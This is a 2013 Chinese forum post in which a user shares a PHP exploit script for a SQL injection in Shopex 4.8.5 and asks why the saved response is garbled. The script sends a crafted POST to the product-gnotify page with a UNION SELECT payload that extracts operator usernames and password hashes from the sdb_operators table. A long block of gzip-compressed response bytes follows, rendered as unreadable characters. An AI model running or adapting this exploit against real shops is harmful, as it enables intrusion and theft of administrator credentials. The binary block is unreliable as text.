关于用php写exp的一点问题

踩(0)

顶(4)

lxsec (我的头像灰了！) | 2013-03-22 22:04

本人小菜一枚！这两天学者用php写exp
是关于Shopex 4.8.5 SQL Injection 一个页面的注入
写的程序
<?php
error_reporting(E_ERROR);
set_time_limit(3000);
print_r('
  Shopex 4.8.5 SQL Injection Exp
  CopyRight lx
  Time 2013.3.21
  Thank You
  ');
if($argc<2)
{
  print_r('
    Usage:php'.$argv[0].'host
    host:target server(ip/hostname),without "http://"
    Example:
    php '.$argv[0].' localhost
    
    ');
  die;
}
$host = $argv[1];
//$path = $argv[2];
$html='';

//make data pack
$cookie="S[FIRST_REFER]=%7B%22ID%22%3A%22%22%2C%22REFER%22%3A%22http%3A%2F%2Fwww.google.com.hk%2Fsearch%3Fq%3Dpowered%2Bby%2Bshopex%2Bv4.8.5%22%2C%22DATE%22%3A1363769829000%7D; S[NOW_REFER]=%7B%22ID%22%3A%22%22%2C%22REFER%22%3A%22http%3A%2F%2Fwww.google.com.hk%2Fsearch%3Fq%3Dpowered%2Bby%2Bshopex%2Bv4.8.5%22%2C%22DATE%22%3A1363769829000%7D; S[N]=AC8CDD46-1DB6-6D0E-DD45-8475002301E6; __utma=218738830.927058834.1363337799.1363337799.1363337799.1; __utmz=218738830.1363337799.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=powered%20by%20shopex%20v4.8.5; CNZZDATA80674826=cnzz_eid%3D29323950-1363769831-http%253A%252F%252Fwww.fangcj.com%26ntime%3D1363770148%26cnzz_a%3D6%26retime%3D1363338149984%26sin%3Dnone%26ltime%3D1363338149984%26rtime%3D0";
$content="goods%5Bgoods_id%5D=3&goods%5Bproduct_id%5D=1+and+1%3D2+union+select+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2Cconcat%280x245E%2Cusername%2C0x2D3E%2Cuserpass%2C0x5E24%29%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22+from+sdb_operators";
$agent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; SE 2.X MetaSr 1.0)";
$data ="POST /?product-gnotify HTPP/1.1\r\n";
$data.="Host: ".$host."\r\n";
$data.="Proxy-Connection: Keep-Alive\r\n";
$data.="User-Agent: ".$agent."\r\n";
$data.="Cache-Control: no-cache\r\n";
$data.="Pragma: no-cache\r\n";
$data.="Accept-Encoding: gzip, deflate\r\n";
$data.="Accept: */*\r\n";
$data.="Accept-Language: zh-cn\r\n";
$data.="Origin: null\r\n";
$data.="DNT: 1\r\n";
$data.="Content-Type: application/x-www-form-urlencoded\r\n";
$data.="Cookie: ".$cookie."\r\n";
$data.="Content-Length: ".strlen($content)."\r\n\r\n";
$data.=$content."\r\n";
//print_r($data);
sendpack($data);

$fp=fopen("./exp.txt",'w+');
fwrite($fp,$html);
function sendpack($packet)
{
  global $host,$html;
  $ock=fsockopen(gethostbyname($host),'80');
        if(!$ock){
    echo "No response from ".$host;die;
  }
  fputs($ock,$packet);
  $html='';
  while(!feof($ock)){
    $html.=fgets($ock);
  }
  fclose($ock);
}
?>
发包返回写到一个文件里面了
可是为什么返回的正文部分都是乱码？
用burp 交就是正常的？

HTTP/1.1 200 OK
Date: Fri, 22 Mar 2013 13:32:44 GMT
Server: Apache/2.2.9 (APMServ) mod_ssl/2.2.9 OpenSSL/0.9.8h PHP/5.2.6
X-Powered-By: PHP/5.2.6
Connection: close
Cache-Control: private
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Language: utf-8
Etag: 54f976826bb21b0f95007b3c5adde31b
Last-Modified: Fri, 22 Mar 2013 13:32:45 GMT
Content-Encoding: gzip
Content-Length: 9115
Content-Type: text/html;charset=utf-8

?      誡{s菓[wXA"悁?D?y$E9簥d?'耿?X +
Xxw!挗Xe'g莙熵.;vb;?g9?栥?;?}岥?墀gfwg )9W昐brwv==??=统窍=箌踹焃QZnЛ<豸曳/,+‐>萆鍇誷树緐踱窌Pz?]雨觏|~錜JI礬稺午鬃椎鮅筒淁珬?訵?嬊?翟阯=5瘻ent赸蠱qvv柗fu
綆_谜
ㄛ?萧蚚曉舱u嵁浕嘿3RJ嵖UR徭╉淩k槎c笗聚韧??譼燮K辿迩?各鬂服簕踺?鈒? w鯉QI?6?活`獕嵆j竇輕j顿#??也it
[w-[绿晼誟貾Υm歛C9??踙WR&楻Z堆à?z震#ジ@/>w籀戇锐j勆爄詹nvtc6w芡夺?悯:p\?kN瀩裫鹌k宿  ?
龞蜬S笄庌襪呮琓敪?U轏鮰窌*М錝賂悼殛v??馸孵fM否陧粉?pa豮1?
媴Ba;涥踡闔y]N孔蜃#4鬾硋C玒漦?獝觨?ì1r桅湒匐欇媪
綒^藶举
?躊T糈箹?鋬郿占6稬c齪樱歗+惛a?蝡z蕃Y?堧@@ナ蘩u逞侔g[鮺屯QE辢{{钬殉yN-撯氐J?K?颶V垩n8o訫硬闚7岹?~扈嘿璠?l??瓗
伖ゝ齨?G:硊扈?G?.I?Y健T浩簜ｆ??緹s輟讷撳蛶8唥税瘋
逝梢潇鬺?曞咛枼仺熵QE?優縫盏?鏦.W?+LC鹰?楇 ?z樯?娥拴>崀?]k郎?積:?
?E,蘘蘁繿郦A霡鞈診??鞙??^穓}b>嵣郯镘??~1B7粰宮竲?脢12#餞7潪?劔Kl芺?秳<甭?嵈彚狋C暮m??嘃*岁b乭艧旎?津?璶袁?醐漑己採嘴榷裿尛n忦a!yI徘$酟?V=I+?f?~呛摠!{@g琺
O<}釡G鬐?%c翺泆櫀%蔶7*I+柵赥?
<hl<?渎归?攫
??ㄧ臬巏rz*SVUo9%??澟坣!VB齬糿?篹?+v7烼垙鷉漵荌:擋ㄞ/?庳侯陼-趼9祵?鉾奠5酮D0j賕N捒 O Y"o忈晩_%?g*2E?(
啃 €陎EU乔Y'鈼v醆???i寶捚骁蛫u蒟聼枲L?btk毖21?z硄 }?濻x?:鯗錕没籶n[?m顰?t?(E啎兒U顲艅?欙螡鈚?i;?垪€(咗fK璃@?-?見╭:y碨S?K?楎?Z冺w??姀?UbEJ?亿`B椣抟埤8秫琗c2秱毀耽*?48)艶洗
?
H4讂忖???,%骖1o 矄?抐衟友韃l奧?  _<釘N?B'謄荍g2?劺B鍺!?\臨F?偛(Q弴G克+S樘i?昁爪翞铛 {Y菃?皾  ?轰b?/厌di??#
镎觠 琈?Db严@?YF瞹5C附$聛w[F莗颥D穘?yfD9y2h羷聨9袑!鄨謿?Xh鲭?e?焇礮遡?p靊
zt譛硦bnbb?uff&WT閱昝4|
@?蟢P墫(?6u 9跭W跇$闈\憜姠4u嵭労*匙?魪徍迟玨鲏悒w擝?*V  桸YU*襊緁5薜jV[YPD舼辯讵R骘?繺?藕?r:沝N扱柷H7?絀9驕 柲劀ネ珃摱萡j珔雜姡鮰3??Z俽?
?襇=?蓚hC[鳄砋  s轗 碨THN镙祕懽"?8>y紭?稧捝NY輍椠稕?'老?SlLOV胝z?i7z蛿Re6[%UH錫畦?悇釞 C:じ?垙`i?氛呫 哊x鹦??$ 尘?z/ 9寿~?撱??耹?瞒阎笜^F1+q4{戴蜅PgRgx鲋c?钌嵀L復N幫荲螌吞幫,彮L?-嵧,Q  =溿fg0宺旐o&痨以踡棉?'r誰qf屯?^档^稅+鋜光d甶浡?弯H!SR鱴幬
燨??[?洕?尛斊fV苀'芕f?媗V|z3焉@覇&拸z<GGnfa@垅守R墠?6s啎?[ZN繴x剴4烗鄏1k`麎a<#鮻?孈绿??`椙  -鳬H 6蝐??>Gx幱桃
?s3c3媍K?愑?>沦<Q{擪/€O9翶众F??TG褭;`樮Xp 莓祌蠳 7
湲-???1?抧S袭^mJ蚳穥pB@9 Y罗潪^颰夕u?>豘[?躺嬍甍馏?筠嚆?;貙〩9kv{}W醻Tz=?鎚?i 梧?郇暲资敭J??溔
(霊o??&?觐荐揞g繓柇??M)V?' 47f罷踼?T縦殖'%忱癅璒?絶K??麩飤?I$
8?堕?旀?$膘顿l眜盽侾??鞉睹E?「嗌漒7虽??<涛?潛E晤邁蝴孄 嗲铏I椗i?K叡?圭?铑城?納~l"
=骟r?黵绡风30様$鈟癹w咻y膈琼?軪圔?
板瀢~鷽?龝z?
珡5$%C?苫'v醯j訐傱jk3匓陛.喟?緉凓鍲?y稏璿??隹媥盼F:岃?N毺6L惋穬鹢 ~?耩?击?

?€S娹茩?t▊圌龔挹嗫鵩-$?n胂舡9Q璞;C??鋗 V騥莠??叡橉?7I榶吐揼轂Y擊??;jà知m絳S帚麵捼"<誯L崈?橵I?碍o柣V叢gJ?"蘬B?騦??'J獉s 隔l炑偫鬅O?殇黪z庆骀?Fmj篜狹J跻dJ骠靦q鍸Io滪蘒i┪鎇E&擝牎餅#S讐▄燒f痍缌v0虷^hM|哮??炢??z5╓,h0a暳?I73?鹢>;x筠茂n  M吉湥|<=:倂蘅畸轔?鵫鳙F萹塭蜟D贇氝KL~?_磔??5}r椥衿s;稂`珥筐
絆>槛蹏_黡椏摞?冪飩憷k+9癷{疝縷绽?/峻皤?旒縻轃?m萘梠?|鍩~嗾作焳n@蟔鰺}g鱹觏颻?荱A7x4栖B叼魟紃?Z佯埳?Y?4錷鮸cn欟簛抉胵輥蔴y同C;6觶?=埂蟅RSf<p?0儮狵\滇<?橏`?SmZ$鑰v爊鬓餰嬹ェo鑮2];蕉
oT事仌嘙湭2峝mc峃.?M虙c脿ヴx9n?泿舖"?kOG殑嶥釨壯氏=C2QX韉晝k炥!6洃'保屨葢a醋頖O誃j?A跒??^?~My魛=炈-?餙R敨栯Zl=湕p?Z?詾b??脏犦L诮笧4す朹€肴? x 钧鍍镯~黤燱 o韀グ'a華e[?渤f螎蜑聱閃伙究篁?颻゜v领X?﹁t籩ju薸缝vm驒~接^ow诜蹑禚韻fsb使蓍>赢虾纷嬫?硰6nU訨甿5M?[ca?z?y舍
Dt杚霗噪?莾?L烂嵭"渶铖怆`山?摭?磔?寍?E鮣o?
z訇m2eZ檧e糩uzs騉吙宆髟|82€€H鑚鏞炕包脏?媴  鞛E靯>嫄c肉犆?{q黲I?逼?脷悪7x?僕筐鰭w~褚?>儃?|噱/?鯼缬鼢?佧鼡壱??[i~?蹮揆q坋嬨雔瘴螩?籣繀蔢崺散??6k?輞飼罧忐餭p歁
筊盭?絳??}/弯&'KQQ琵疴!蛍杀揁?詌樬b?沑lv賄7瞢?_kTZ?粑?鏸x眷?2\仟腽ur昉昒?婠  鰃|恿Y墔9G>?咊?mS挈+贃墏薦製票tvUer5“2谩 簁X?,?忀P["宬;Q悡牙??蜔:vt锪??淑頲G蟹,[i#P蚗誐W縉甁,I璌~僬趗? ???C羂屼墖鎘.醚T蝢顮㈦u58︶?瓃
?趿桯!?8?膋?靻涢搃暺缺 "睒?av?=咹?枀Aj昒?>鞘穛渃竁X鑅z婹dy馦YP堬??;鐝LB哰?^裲摔虘BG薕Y<?澭6O臰噗?溗GG暨森曑覨r+>]:]璐漳灀跐\翍~橗盧j喦鞍叛橀鰍?_n
霭?V+?'vK總飺t2?磬P撈畚$暺?!?;%嫭羉鴶)遮狉H凴|??8葩'?u偫?偁D 5祪?r?  ]鴩€I婦g耙恓垡罫°?D呢8?Ne讯鮉??褨?蒱7橪$*驮5灳黰堤廬貯Z"躬?塍 .V3姞桎 ,嘚?:葒J(厞珘?脬??瓗揱Y#1U!??Z[5?唚*Q^豗?植,囵q搫n~朥rS'矊战 ?馳O$弶莭墜??C抎??m81
拗狿?h&ijV鱆縑? G??笺G?8搀?婎?|<璱翫虲厏m鹨鸔?l喢!嘬?r+孎;?鶎Nb/鸼祧??已矚
G,/^竞饵溆棶"V??E芻.脃X鄛?朼jF?甜"肤柆

枬NE?咏项jPX蓴囧I莲熿??ze?謽髪卷鉴?冲>鴃绻O饄p镥潫}&j恠+晥?c??w頻%?
L趵?鳴i?T?啩F裢哾?TUR}硦膭鄽?'萮哹柏C0谸盧鋍€'咲盹艉*|砶淔?0 *扸8h(呟蝮#i+3"4B！9衼鹸狚%??gs荶\L牮鐇醅楕'>}>?駱[j??4  詣f?翶耯?D,H?p坔r??持RZ?幻?Lg?qlqN蔼9奛1?j?
韗h(瘷"颮hLGp襊滻  蒆?UK"k櫢z 樶

毝i@OQ]Z.I'/?侟?D彫滄?嗨趯Gc拹糈xf??I佯BT?昪>AC璵t沶+*妞
胾?#pq炋
黐?|钵3尸D?b??>F笯 及
R€W貝<?;鄥椺s???廹Mr◇H6%蛝寓Z唼龇爭??Y(Q
杋5昜`k?堒們爚O*`桗洟韬鎄i騏啬L?3hxP;客晬^趲賯?挗  楏?靓u怍)?撵"7   xU蟩?8屳?%吪,l_T??侄6Hgpg?趩g!樈?~Tr
嬠魠4?昒骛I?!辟舱黢o6``?劆曊 动|薆?T.5?&薣衅檨??N嬢喧T鸶?愲瓬+庲<n缂?$*€鱫6Z摋d}泐欙??礱禲栝X鮲C]C惢Y)d╈蠂?,?鹫珿陟
?侑?獶匙珦塶 FY聯??冔€袹\U岊寐?迉蹶諢汈霌/.?畛J??F?尟
T熨诓D^CH?鞛唌u猜亹d %?耺骛2嚙F?趇I龍a絅俉飰瑨ま鉂耠$箩?=棃_v鏝?估  ?t5Sf;]詥JJ粋Z柙?
v
圸Gwk璽>梌齸铤﹨ 咭髾??怇;T佟*?窠?]?n牥i≦,鲽5?愲{诉霜衴n獕K擎5l3鋃cXe惣裝琩G€K??姽1p:鉵&z'?c嵠苭热"?  磰誒^VQ.<&W绚8'/}?#q$:?员和珫笢(沆p3憼?如墑刅l@?\2l(]1)d??姢T3~
\`u臸?阵a?梍vw怹>蓶
j 釷?彐B
??"し??T~db?!T鵿詗菘O钧L諦€9勊R A?磲N`烇袋aㄧN?j鑀#p禐黇z媦x=蘸\膙?m%F?殏`i~lK嚖?????倂埼O?>艇"鎏-團V?吂|e;ad.暴?vez?5??4
?嶈"謚满q";怋?NA)魨D_\捤隝n慳?愋_啷  0怾綖?{玱S纲╩L鄿猧碔+?旼焬寙+访??lt?6慤檹暐?鬻-??緞?t掄缅 ???i珿q?磑憋F?vY椨1誴?飔HH諾F??.'=鐄?疪腻綏o嗔髢~辖烨m>?x俚=綮鈥q1?;y??啌9袀躽<擦?搷质鹫9p0w2h?M8戀?﹣哬/??NY浡?|Q囄;q臲?4?*軰?骵fDl屡戵C??賁?鑠a賯?QD5#澘vm嶷寛毵3锥笸>fcB蝙c?%?i攍i褏埉n︷
J~CU痉?9鹆窷湪T 浶瘙淹(J?薔??乛v钸蠲耓?'U1 M啾6?w
?:禹鉽+?淺?#蒦F?y緅?燽J崌+4R??{灋??x荶1X?虂爭冏鉅纻廼q?8&跺nXf7谽?佉DJ?2?0u8R頂??7稦jZBU
?%o"DXBZ刓燧绵底櫗t 岿?~判   热蘿榐S'贁
c啩?Lo玼0亵挅u魍哳鉴9?A?'Yn?諮?堜vt獈8"9?礿彯採蚥H?mb勗A?翛t?屳內
(a噌灔€赾?岧殡?殸蘃嘧剣殮dx?哛 ?彳秖
??J#q峆f滒h
r+阰鯭[鷬??@??"嫄U?(/?%?碡姬?2偙Gm&袁鏹?? ?3<Q裵N蓛?粏} C媫TJ1挻釋P 挕牐钿/C?潓?箈?馓1?Ba"緣?蝶整縳v?砑?€儓籋祺?d拢c倜憏W..璡?w硫>5晒r2
裔◆罭?*?^?oK?j蜶?&?您ISG岞'银呺荶觴A|(@#廭c咤€峾"u峱x冖?惚t4厓O?銸慙a鸠錡?\7膀fx>p`?
??BE??レ憭射兯e另0溾&?F~愷謜?琾&骫抮嘛濏蓰p飺缏噬僿?J

皩囦啇沤嘠@亶?W疸 }镝_鵖l鸇r踿?(坡旄宠d奴廖蒧|鶫6茿b€%坉螤楧B潁  DG!弴?c?虺槠壩鯿8匄?(梯A?w的CSFげzq8聅淓笇m4)┑毥UV)?!?监肎崞琢?谛M崽?d%J 嘋y?;恨k_?餼!Z?銘+"?錔?璹鬠))嵏姓%?'k噘by"L╖葅?骑絭麽镟*)n孙魁祜2.g?藓赥衖愮@JＡ???MN 嵸)b鄢?椓
－?塥L孲禛JBD箓怌  ?+B?$S殾,E踌a貲貎HOU聺_?礏z#\
F颉E攲;豪L7ニ餽灡H"曌9T"?姚奎粥#J?各k茯,騞(<3?!zq代蠅b裁牂n?透骉兤厊|?{~v+农)d  )審_仯畟?皉槭?螷?>~9??%?A嗠=]{??=})朎胣$?熉?菏!'鏍竤B<㈠蓋嬙噍屣＋?+锄)Y?\E>Jq?p烬1O6砾氏?d}惽蟛'萗!价?ョ"Hd敪C?冁?qK??hbWdC{YзeY$X绌x袁坴鍈 D??驃跖銦og婛K镴鵗9?肏忥崃?^?e[??0}梜?揙XW賺氞;?B跷稈?s>?狸?付〣;P?*N窢鶟?纲忚
捍岠R瑯厵悘\€?Z@2傒汦栉KpGl於愵鳜躆?!C??>癕筣?捔炙8I藈?$я:(蠩?掔#骭)]R硱鯁勅溔P€綅9\9\薑H掬(?d4J稌:螥薚i€?s?鑝(?7胧壀^?&?M:鱞臦9樌塅:<胉9i犞4M橢h绺T*僎?淏J7Bh
媯N敘x橌z.? 屷?d煹祢塈鰋囓?4??>翈迬&,谛稊|裯?靵抍Jm覄黤\v出?@熌?q畊``?[?r Z6>In?峥阮
2lZ{磥汹Z萢i xb2摜u
枅p呞t'薻A??谜A?聶9CS 莻肥傡8`"崅袱颹6艤?杮??敻赽: wJ骏lEZSh ???宯暣@DN斴JM溭拠9p葿觕匪0_'駆6?鰜?彛努?櫏%f[f|fcL乞枲醛=<??xV槨N€?盕"顤g*?lL潊>鬀谝猻;?o郋鮶YM?曝
絚?藡6?凮軠麿騂朞缦衔NO?鵉?q~眲|3\瓮鳖倕泡*b覾&f箰淍;_0?殰L%B*擎寇"'膎悹!8儔1QH閂谾B橷?+?#?6纇v蔩夺C?oXr慗F?鏴 前際?'sq鐀矯i︳?'◣頠H?^?閮$??%€?塨处孛
RyB趉r/拠昰斏搢??聍商6她C购?屍?璕5J嶊t<UKベ35/zM?S獚阆兝磄F?2稥rFz?眡i嶮S捳4饭0uユ煵p}吱髝汴θYU峵7];S渽*A尕質┦#摮H獦歘賎??蹧漉d$>睲?W坟?筇咕?踈(?ox鐗踗O1?.L4€藵刐z刽蒻?Z{隭窓罼c?j:353QoW&T  9泒\怜?? ?冫=NmV'&?j餲濨FQ,S损帞嶐 ?/z?躢o